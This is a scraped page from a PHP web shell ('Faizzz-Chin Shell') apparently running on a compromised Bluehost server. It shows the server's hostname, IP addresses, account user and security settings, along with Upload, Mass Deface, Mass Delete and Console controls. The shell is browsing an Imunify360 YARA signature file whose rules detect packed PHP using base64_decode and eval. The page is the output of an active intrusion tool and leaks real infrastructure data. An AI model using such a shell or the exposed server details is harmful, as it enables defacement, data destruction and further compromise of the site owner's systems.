SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

: /var/imunify360/files/sigs/v1/heuristic/ [ drwxrwxr-x ]
Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.29 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.145
Date Time: 2025-07-12 08:56:43
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system
Upload Mass Deface Mass Delete Console

name : main.yara 
// import "math"
include "webshells.yara"

/*private  global rule size_limit
{
    condition:
        filesize < 1MB
        
}

private rule is_php
{
    strings:
        $str = /<\?(php|\s)/

    condition:
        (filesize < 1MB) and $str
}

private rule php_keywords_rate {
    strings:
        $keyword = /\b(this|if|return|function|else|array|false|true)\b/
        
    condition:
        is_php and math.divide(#keyword, filesize) > 0.001
}

rule php_packed
{
    strings:
        $func1 = /base64_decode\s*\(/
        $func2 = /eval\s*\(/
        $func3 = /\$[a-zA-Z0-9_]+\(/
        
    condition:
        is_php and (($func1 and $func2) or $func3) and (math.entropy(0, filesize) >= 5.00)  and not php_keywords_rate //5.81
}
*./
© 2025 Faizzz-Chin